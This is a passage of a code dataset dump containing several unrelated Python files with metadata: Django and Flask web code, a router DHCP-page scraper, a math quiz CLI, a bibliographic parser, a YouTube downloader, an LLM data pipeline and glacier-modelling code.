applicable',\n 'postal_code':'Postal Code if applicable',\n 'country':'Country',\n 'email':'Contact Email',\n 'phone':'Phone',\n }\n #'about':'About our organization',\n #print >>sys.stderr,\"what?\"\n\n\nclass ResidencyForm(ModelForm):\n class Meta:\n model=Residency\n #exclude =['title','HEADER1','HEADER2','HEADER3']\n\n\n@processor_for('add-a-residency-opportunity')\ndef residency_form(request, page):\n print >>sys.stderr, \"in residency_form\"\n form = ResidencyForm()\n if request.method == \"POST\":\n form = ResidencyForm(request.POST)\n if form.is_valid():\n # process form, like save data\n form.save()\n redirect = request.path + \"?submitted=true\"\n return HttpResponseRedirect(redirect)\n return {\"form\": form}\n\n\n@processor_for('add-organization')\ndef organization_form(request, page):\n print >>sys.stderr, \"in organization_form\"\n form = OrganizationForm()\n print >>sys.stderr, \"after form=in organization_form\"\n if request.method == \"POST\":\n form = OrganizationForm(request.POST)\n if form.is_valid():\n # process form, like save data\n # hmmm...how do I do this? I want the pages_page.title\n # to be the name field. oh well.\n #form.cleaned_data['title'] = form.cleaned_data['name']\n form.save()\n redirect = request.path + \"?submitted=true\"\n redirect = \"/\"\n return HttpResponseRedirect(redirect)\n return {\"form\": form}\n\n\n@processor_for('list-of-organizations')\ndef organization_list(request,page):\n orglist = Organization.objects.all()\n print >>sys.stderr,\"organization_list for list-of-organizations\"\n return {\"orglist\": orglist}\n\n@processor_for('list-of-residencies')\ndef residency_list(request,page):\n print >>sys.stderr,\"residency_list for list-of-residencies\"\n reslist = Residency.objects.all()\n return {\"reslist\": reslist}\n\n@processor_for('show-residency')\ndef show_residency(request,page):\n print >>sys.stderr,\"show-residency\"\n\n slug=request.GET.get('res',None)\n print >>sys.stderr,\"slug: %r\", slug\n res=Residency.objects.filter(slug=slug)[0]\n\n org=res.organization\n return {\"residency\": res, \"org\": org}\n\n\n@processor_for('add-a-residency-opportunity')\ndef show_organization(request,page):\n orgslug=request.GET.get('org',None)\n print >>sys.stderr, \"add-a-residency-opportunity org:%r\" % orgslug\n return\n\n\n@processor_for('show-organization')\ndef show_organization(request,page):\n # this is where we could do the offer/requires formatting, but \n # I am doing it in a template_tag. \n #for res in reslist:\n # pass \n print >>sys.stderr,\"show-organization\"\n\n slug=request.GET.get('org',None)\n org=Organization.objects.filter(slug=slug)[0]\n\n print >>sys.stderr, \"org?\"\n print >>sys.stderr, org.name\n print >>sys.stderr, org.website\n print >>sys.stderr, org.city\n print >>sys.stderr, org.country\n reslist = Residency.objects.all()\n return {\"reslist\": reslist, \"org\":org}\n\n#### this is from the docs.http://mezzanine.jupo.org/docs/content-architecture.html\n#### basically exactly what I need :-/\n\n#from django import forms\n#from django.http import HttpResponseRedirect\n#from mezzanine.pages.page_processors import processor_for\n#from .models import Author\n\n#class AuthorForm(forms.Form):\n #name = forms.CharField()\n #email = forms.EmailField()\n#\n#@processor_for(Author)\n#def author_form(request, page):\n #form = AuthorForm()\n #if request.method == \"POST\":\n #form = AuthorForm(request.POST)\n #if form.is_valid():\n ## Form processing goes here.\n #redirect = request.path + \"?submitted=true\"\n #return HttpResponseRedirect(redirect)\n ##return {\"form\": form}\n", "repo_name": "RichGibson/hir", "sub_path": "page_processors.py", "file_name": "page_processors.py", "file_ext": "py", "file_size_in_byte": 5497, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.forms.ModelForm", "line_number": 14, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Organization", "line_number": 19, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.forms.Textarea", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms.Textarea", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms.Textarea", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.forms.ModelForm", "line_number": 53, "usage_type": "name"}, {"api_name": "models.Residency", "line_number": 55, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 69, "usage_type": "call"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 88, "usage_type": "call"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Organization.objects.all", "line_number": 94, "usage_type": "call"}, {"api_name": "models.Organization.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.Organization", "line_number": 94, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 95, "usage_type": "attribute"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.Residency.objects.all", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Residency.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Residency", "line_number": 101, "usage_type": "name"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 98, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.Residency.objects.filter", "line_number": 110, "usage_type": "call"}, {"api_name": "models.Residency.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.Residency", "line_number": 110, "usage_type": "name"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 104, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 119, "usage_type": "attribute"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 116, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.Organization.objects.filter", "line_number": 132, "usage_type": "call"}, {"api_name": "models.Organization.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.Organization", "line_number": 132, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 134, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 135, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 136, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 137, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 138, "usage_type": "attribute"}, {"api_name": "models.Residency.objects.all", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Residency.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.Residency", "line_number": 139, "usage_type": "name"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "16793744156", "text": "from django.shortcuts import render\nfrom .student_info import StudentForm\nfrom .models import StudentModel\n\n\n# Create your views here.\n\ndef student_view(request):\n # create an instance of form class\n newform = StudentForm()\n\n if request.method == 'POST':\n newform2 = StudentForm(request.POST)\n if newform2.is_valid():\n name = newform2.cleaned_data['student_name']\n course = newform2.cleaned_data['course']\n adm_no = newform2.cleaned_data['admission_no']\n\n student = StudentModel(Name=name, Course=course, Admission_No=adm_no)\n student.save()\n return render(request, 'studentsapp/index.html', {'form': newform})\n", "repo_name": "jisshub/django-forms", "sub_path": "formsprj/studentsapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "student_info.StudentForm", "line_number": 10, "usage_type": "call"}, {"api_name": "student_info.StudentForm", "line_number": 13, "usage_type": "call"}, {"api_name": "models.StudentModel", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "35172017898", "text": "# coding: utf-8\n\nfrom __future__ import absolute_import\nimport unittest\n\nfrom flask import json\nfrom six import BytesIO\n\nfrom bill_segmentation.models.error_handle_dto import ErrorHandleDto # noqa: E501\nfrom bill_segmentation.models.img_on_server_dto import ImgOnServerDto # noqa: E501\nfrom bill_segmentation.models.roi_pts_dto import RoiPtsDto # noqa: E501\nfrom bill_segmentation.test import BaseTestCase\n\n\nclass TestImageProcessController(BaseTestCase):\n \"\"\"ImageProcessController integration test stubs\"\"\"\n\n def test_warp_perspective(self):\n \"\"\"Test case for warp_perspective\n\n 对图像进行透视矫正\n \"\"\"\n roi_pts_dto = {\"pts\":[{\"x\":0,\"y\":0},{\"x\":100,\"y\":0},{\"x\":100,\"y\":100},{\"x\":0,\"y\":100}]}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/bill-segmentation/warp-perspective/{bill_type_id}/{img_id}'.format(bill_type_id='bill_type_id_example', img_id='img_id_example'),\n method='POST',\n headers=headers,\n data=json.dumps(roi_pts_dto),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_warp_segmentation(self):\n \"\"\"Test case for warp_segmentation\n\n 分割指定图像\n \"\"\"\n headers = { \n 'Accept': 'application/json',\n }\n response = self.client.open(\n '/bill-segmentation/warp-segmentation/{bill_type_id}/{img_id}'.format(bill_type_id='bill_type_id_example', img_id='img_id_example'),\n method='GET',\n headers=headers)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "hustrlee/bill-segmentation", "sub_path": "server/bill_segmentation/test/test_image_process_controller.py", "file_name": "test_image_process_controller.py", "file_ext": "py", "file_size_in_byte": 1888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bill_segmentation.test.BaseTestCase", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 32, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "1727350053", "text": "### Simple way to scrap list os ips and macs from RV042 firmware 1.3.12.19-tm.\n### You will need the html with the information.\nimport re\nfrom jinja2 import Template, Environment, FileSystemLoader\n\n#return a vector with dicionarys which contains ip, mac, hostname\ndef scrapper(file):\n out=[]\n for line in file:\n if re.search(\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3} =>\", line):\n dic={}\n dic['ip']=(re.search(\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\",line).group(0))\n dic['mac']=(re.search(\"([0-9a-fA-F]{2}[:-]){5}([0-9a-fA-F]{2})\",line).group(0)).replace('-',':')\n dic['name']=(re.search(\" 1 .{1,15}'>\",line).group(0)[2:-2])\n out.append(dic)\n return out \n\n#function to create the file using Jinja2 templates\ndef generater(dic):\n outfile=open('out.txt','w')\n env = Environment(loader=FileSystemLoader('.'))\n template = env.get_template('template.txt') \n with open('ipmacname.txt', 'w') as f:\n f.write(template.render(data=dic))\n\ndef main():\n filename='dhcp_setup.htm'\n file=open(filename,'r')\n dic=scrapper(file)\n generater(dic)\n \nmain()", "repo_name": "davirussi/RV042", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1135, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.search", "line_number": 10, "usage_type": "call"}, {"api_name": "re.search", "line_number": 12, "usage_type": "call"}, {"api_name": "re.search", "line_number": 13, "usage_type": "call"}, {"api_name": "re.search", "line_number": 14, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 21, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "7069079424", "text": "import argparse\nfrom math_test import *\n\nparser = argparse.ArgumentParser(\"mentalm\", description=\"Mental math tester\", \n\tepilog=\"Created by Daniel J. Perry (BioBox)\")\nparser.add_argument('-cfg', default=\"default.ini\", \n\thelp=\"ini file for your settings. the defualt is default.ini\")\n\nargs = parser.parse_args()\n\nclass CLIMathTest(MathTest):\n\t\"\"\"A MathTest implementation in the terminal\"\"\"\n\tdef __init__(self, config_file):\n\t\tsuper(CLIMathTest, self).__init__(config_file)\t\t\n\n\tdef display_question(self, i):\n\t\tprint(\"\\nQuestion #{}: {} = \".format(i+1, self.questions[i]), end='')\n\n\tdef get_input(self):\n\t\tuser_input = input()\n\t\tif user_input.capitalize() == 'Q':\n\t\t\tself.quit = True\n\t\t\treturn user_input\n\n\t\ttry:\n\t\t\treturn int(user_input)\n\t\texcept ValueError:\n\t\t\tprint(\"Please input a number: \", end='')\n\t\t\treturn self.get_input()\n\n\tdef end_test(self):\n\t\tans = self.answers\n\t\twrong_ans = [i+1 for i,ans in enumerate(ans) if self.u_answers[i] != ans]\n\t\tlen_wrong = len(wrong_ans)\n\n\t\tprint()\n\t\tif self.quit:\n\t\t\tprint(\"TEST ABORTED.\\n\")\n\n\t\tif len_wrong == 0:\n\t\t\tif not self.quit:\n\t\t\t\tprint(\"You got a perfect score. Congratulations!\")\n\t\telif len_wrong == 1:\n\t\t\tprint(\"You got number \", wrong_ans[0], \" wrong.\")\n\t\telse:\n\t\t\tprint(\"You got {} wrong. They are numbers \".format(len_wrong), end='')\n\t\t\tprint(*wrong_ans[:len_wrong-1], sep=', ', end='')\n\t\t\tprint(', and ', wrong_ans[len_wrong-1])\n\n\nmath_test = CLIMathTest(args.cfg)\n\nprint(\"This test is {} questions long.\".format(math_test.numq))\nprint(\"Press ENTER to start the test...\", end='')\ninput()\nmath_test.start()\n", "repo_name": "BioBox/mentalm", "sub_path": "mentalm/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 4, "usage_type": "call"}, {"api_name": "math_test.numq", "line_number": 53, "usage_type": "attribute"}, {"api_name": "math_test.start", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "71788763714", "text": "import logging\nfrom typing import Any, List, Dict, Optional\n\nimport pandas as pd # type: ignore\nfrom pydantic import BaseModel\nfrom wikibaseintegrator import wbi_config # type: ignore\n\nimport config\nfrom models.swepub.affiliation import SwepubAffiliation\n\nwbi_config.config['USER_AGENT'] = config.user_agent\nlogger = logging.getLogger(__name__)\n\n\nclass SwepubContributor:\n \"\"\"This models the contributor aka author in the Swepub raw_data\"\"\"\n given_name: Optional[str] = None\n family_name: Optional[str] = None\n affiliations: List[SwepubAffiliation]\n orcid: Optional[str] = None\n local_identifier: Optional[str] = None\n\n def __init__(self, person_data: Any = None):\n if person_data is None:\n raise ValueError(\"instance of was None\")\n else:\n self.affiliations = []\n self.__parse__(person_data)\n\n def __parse__(self, contributor_data):\n if contributor_data is None:\n raise ValueError(\"raw_data was None\")\n # pprint(person)\n if \"agent\" in contributor_data:\n # This designates the role of the agent\n agent = contributor_data[\"agent\"]\n if \"@type\" in agent:\n affiliation_type = agent[\"@type\"]\n if affiliation_type == \"Person\":\n if \"givenName\" in agent:\n self.given_name = agent[\"givenName\"]\n else:\n logger.debug(f\"givenName was not found in agent {agent}\")\n if \"familyName\" in agent:\n self.family_name = agent[\"familyName\"]\n else:\n logger.debug(f\"familyName was not found in agent {agent}\")\n if \"identifiedBy\" in agent:\n identifiers: List[Dict[Any]] = agent[\"identifiedBy\"]\n for identifier in identifiers:\n if \"@type\" in identifier:\n identifier_type = identifier[\"@type\"]\n value = identifier[\"value\"]\n if identifier_type == \"Local\":\n # these seem useless because they cannot easily be resolved to\n # anything and are specific to every swedish research institution\n self.local_identifier = value\n elif identifier_type == \"ORCID\":\n self.orcid = value\n else:\n logger.debug(f\"unsupported identifier {identifier_type} in swepub agent\")\n elif affiliation_type == \"Organization\":\n # print(\"agent:\")\n # pprint(agent)\n self.affiliations.append(SwepubAffiliation(affiliation=agent))\n else:\n logger.debug(f\"unsupported affiliation type {affiliation_type} in swepub agent\")\n if \"hasAffiliation\" in contributor_data:\n # This affiliation is not linked to a person. Why? Bad raw_data?\n affiliations_data = contributor_data[\"hasAffiliation\"]\n # print(\"hasaffiliation:\")\n # pprint(affiliation)\n # exit(0)\n for affiliation_data in affiliations_data:\n affiliation = SwepubAffiliation(affiliation=affiliation_data,\n linked_to_person=False)\n # Unnest the subaffiliations\n if affiliation.has_subaffiliation and affiliation.subaffiliations is not None:\n for subaffiliation_data in affiliation.subaffiliations:\n subaffiliation = SwepubAffiliation(subaffiliation_data,\n linked_to_person=False)\n self.affiliations.append(\n subaffiliation\n )\n # Save memory by deleting the json raw_data\n affiliation.subaffiliations = None\n self.affiliations.append(\n affiliation\n )\n # exit(0)\n\n def full_name(self):\n return f\"{self.given_name} {self.family_name}\"\n\n def export_dataframe(self):\n if len(self.affiliations) == 0:\n affiliations = None\n else:\n affiliations = self.affiliations\n data = dict(\n affiliation=affiliations,\n full_name=self.full_name(),\n orcid=self.orcid,\n local_identifier=self.local_identifier,\n )\n # The list around raw_data is needed because we have scalar values\n return pd.DataFrame(data=[data])\n", "repo_name": "dpriskorn/SwePub2Python", "sub_path": "models/swepub/contributor.py", "file_name": "contributor.py", "file_ext": "py", "file_size_in_byte": 4783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "wikibaseintegrator.wbi_config.config", "line_number": 11, "usage_type": "attribute"}, {"api_name": "wikibaseintegrator.wbi_config", "line_number": 11, "usage_type": "name"}, {"api_name": "config.user_agent", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "name"}, {"api_name": "models.swepub.affiliation.SwepubAffiliation", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 49, "usage_type": "name"}, {"api_name": "models.swepub.affiliation.SwepubAffiliation", "line_number": 65, "usage_type": "call"}, {"api_name": "models.swepub.affiliation.SwepubAffiliation", "line_number": 75, "usage_type": "call"}, {"api_name": "models.swepub.affiliation.SwepubAffiliation", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "37660039185", "text": "#!/usr/bin/env python3\nimport math\nimport os\nimport sys\n\nimport yaml\nfrom colorama import Fore\nfrom pytube import YouTube\n\n\nSCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))\nCONFIG_FILE = os.path.join(SCRIPT_DIR, \"mytube_config.yml\")\n\n\ndef main():\n try:\n # Read in the config\n with open(CONFIG_FILE, \"r\") as infile:\n config = yaml.safe_load(infile)\n\n for item in config:\n if \"video\" in item:\n handle_video(item)\n elif \"collection\" in item:\n handle_collection(item)\n else:\n raise ValueError(f\"Unknown entry in mytube_config.yaml: {item}\")\n\n except Exception as e:\n print(e)\n sys.exit(1)\n\n\ndef handle_video(video_config: dict):\n download_video(\n url=video_config[\"url\"],\n directory=os.path.expanduser(video_config[\"dir\"]),\n name=video_config.get(\"name\"),\n )\n\n\ndef handle_collection(collection_config: dict):\n for video in collection_config[\"videos\"]:\n download_video(\n url=video[\"url\"],\n directory=os.path.expanduser(collection_config[\"dir\"]),\n name=video.get(\"name\"),\n )\n\n\ndef download_video(url: str, directory: str, name: str = None):\n file_extension = \"mp4\"\n video = None\n stream = None\n if name:\n file_path = f\"{os.path.join(directory, name)}.{file_extension}\"\n else:\n # Use highest resolution mp4 stream\n video = YouTube(url)\n stream = video.streams.filter(\n file_extension=file_extension\n ).get_highest_resolution()\n file_path = os.path.join(directory, stream.default_filename)\n\n # Check if the video file already exists.\n if os.path.exists(file_path):\n print(Fore.GREEN + f\"{file_path} already exists! Skipping...\" + Fore.RESET)\n return\n\n # If stream hasn't already been fetched, get it now\n video = video or YouTube(url)\n stream = (\n stream\n or video.streams.filter(file_extension=file_extension).get_highest_resolution()\n )\n\n # Register progress callbacks\n pc = ProgressCheck(file_path=file_path, file_size=stream.filesize)\n video.register_on_progress_callback(pc.on_progress)\n video.register_on_complete_callback(pc.on_complete)\n\n stream.download(\n output_path=directory,\n filename=name,\n skip_existing=False,\n )\n\n\nclass ProgressCheck:\n def __init__(self, file_path, file_size):\n self.file_path = file_path\n self.file_size = file_size\n self.percent_complete = 0\n\n print(Fore.YELLOW + f\"{self.file_path} - beginning download...\" + Fore.RESET)\n\n def on_progress(self, stream, chunk, bytes_remaining):\n # Gets the percentage of the file that has been downloaded.\n new_percent_complete = math.floor(\n (100 * (self.file_size - bytes_remaining)) / self.file_size\n )\n if new_percent_complete == self.percent_complete:\n return\n\n if new_percent_complete in (10, 20, 30, 40, 50, 60, 70, 80, 90):\n print(f\"{self.file_path} - {new_percent_complete:00.0f}% downloaded\")\n\n self.percent_complete = new_percent_complete\n\n def on_complete(self, stream, file_path):\n print(Fore.GREEN + f\"{self.file_path} - finished downloading!\" + Fore.RESET)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "zjrubin/mytube", "sub_path": "mytube.py", "file_name": "mytube.py", "file_ext": "py", "file_size_in_byte": 3361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pytube.YouTube", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "colorama.Fore.GREEN", "line_number": 67, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 67, "usage_type": "name"}, {"api_name": "colorama.Fore.RESET", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pytube.YouTube", "line_number": 71, "usage_type": "call"}, {"api_name": "colorama.Fore.YELLOW", "line_number": 95, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 95, "usage_type": "name"}, {"api_name": "colorama.Fore.RESET", "line_number": 95, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 99, "usage_type": "call"}, {"api_name": "colorama.Fore.GREEN", "line_number": 111, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 111, "usage_type": "name"}, {"api_name": "colorama.Fore.RESET", "line_number": 111, "usage_type": "attribute"}]} +{"seq_id": "35630880787", "text": "from abc import ABC, abstractmethod\nimport os\nfrom typing import List, Dict\n\nfrom helpers.json_utils import load_jsonl_into, write_jsonl\nfrom helpers.openai import OpenAICompletionProvider\n\n\nclass SynthStage(ABC):\n llm_provider: OpenAICompletionProvider\n\n def __init__(\n self,\n input_path_template: str,\n output_path_template: str,\n ):\n base_dir = \"outputs/\"\n self.input_path_template = base_dir + input_path_template\n self.output_path_template = base_dir + output_path_template\n\n def read_inputs(self, run_id: str) -> List[Dict]:\n \"\"\"Read inputs and return a list of dictionaries.\"\"\"\n data = []\n input_path = self.input_path_template.format(ID=run_id) + \".jsonl\"\n if os.path.exists(input_path):\n load_jsonl_into(input_path, data)\n else:\n raise FileNotFoundError(f\"File with name {input_path} does not exist!\")\n return data\n\n @abstractmethod\n def clean_inputs(self, data: List[Dict], run_id: str) -> List[Dict]:\n \"\"\"Clean the input data.\"\"\"\n pass\n\n @abstractmethod\n def call_llm(self, data: List[Dict], run_id: str) -> List[Dict]:\n \"\"\"Call the model.\"\"\"\n pass\n\n @abstractmethod\n def clean_outputs(self, data: List[Dict], run_id: str) -> List[Dict]:\n \"\"\"Clean the output data.\"\"\"\n pass\n\n def save_outputs(self, data: List[Dict], run_id: str) -> None:\n \"\"\"Save the outputs.\"\"\"\n results = []\n out_path = self.output_path_template.format(ID=run_id) + \".jsonl\"\n if os.path.exists(out_path):\n load_jsonl_into(out_path, results)\n for entry in data:\n results.append(entry)\n write_jsonl(out_path, results)\n return\n\n def run(self, run_id: str) -> None:\n \"\"\"Run the entire stage pipeline.\"\"\"\n data = self.read_inputs(run_id)\n data = self.clean_inputs(data, run_id)\n data = self.call_llm(data, run_id)\n data = self.clean_outputs(data, run_id)\n self.save_outputs(data, run_id)\n\n\nclass SynthPipeline:\n def __init__(\n self, model: str = \"gpt-3.5-turbo-0613\", temperature: float = 1.0\n ) -> None:\n self.model = model\n self.temperature = temperature\n self.stages = []\n\n def add_stage(self, stage: SynthStage) -> \"SynthPipeline\":\n \"\"\"Add a stage to the pipeline.\"\"\"\n stage.llm_provider = OpenAICompletionProvider(self.model, self.temperature)\n self.stages.append(stage)\n return self\n\n def run(self, id) -> None:\n \"\"\"Run all stages in the pipeline.\"\"\"\n for stage in self.stages:\n stage.run(id)\n", "repo_name": "yifever/data_synthesizer", "sub_path": "pipeline/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 2665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "abc.ABC", "line_number": 9, "usage_type": "name"}, {"api_name": "helpers.openai.OpenAICompletionProvider", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "helpers.json_utils.load_jsonl_into", "line_number": 26, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 32, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 37, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 42, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "helpers.json_utils.load_jsonl_into", "line_number": 51, "usage_type": "call"}, {"api_name": "helpers.json_utils.write_jsonl", "line_number": 54, "usage_type": "call"}, {"api_name": "helpers.openai.OpenAICompletionProvider", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "1539477829", "text": "import numpy as np\nimport xarray as xr\nimport logging\nimport itertools\nimport ast\nimport os\nimport shutil\n\nfrom oggm import tasks, cfg\nfrom oggm.core.flowline import (FileModel, run_from_climate_data)\nfrom oggm.workflow import execute_entity_task, merge_glacier_tasks\nfrom oggm.core.climate import compute_ref_t_stars\nfrom oggm.core.massbalance import (MultipleFlowlineMassBalance,\n ConstantMassBalance)\nfrom oggm import GlacierDirectory\nfrom oggm.utils import copy_to_basedir, mkdir\n\nfrom relic.spinup import systematic_spinup, minimize_dl\nfrom relic.preprocessing import merge_pair_dict\nfrom relic.postprocessing import relative_length_change\n\nfrom relic import preprocessing\n\n# Module logger\nlog = logging.getLogger(__name__)\n\n\ndef spinup_plus_histalp(gdir, meta=None, mb_bias=None, runsuffix=''):\n # take care of merged glaciers\n rgi_id = gdir.rgi_id.split('_')[0]\n\n # select meta\n meta = meta.loc[rgi_id].copy()\n # we want to simulate as much as possible -> histalp till 2014\n obs_ye = 2014\n\n # --------- SPIN IT UP ---------------\n tbias = systematic_spinup(gdir, meta, mb_bias=mb_bias)\n\n if tbias == -999:\n\n rval = {'rgi_id': gdir.rgi_id, 'name': meta['name'],\n 'histalp': np.nan,\n 'spinup': np.nan,\n 'tbias': np.nan, 'tmean': np.nan, 'pmean': np.nan}\n return rval\n # --------- GET SPINUP STATE ---------------\n tmp_mod = FileModel(gdir.get_filepath('model_run',\n filesuffix='_spinup'))\n tmp_mod.run_until(tmp_mod.last_yr)\n\n # --------- HIST IT DOWN --------------\n try:\n run_from_climate_data(gdir, ys=meta['first'], ye=obs_ye,\n 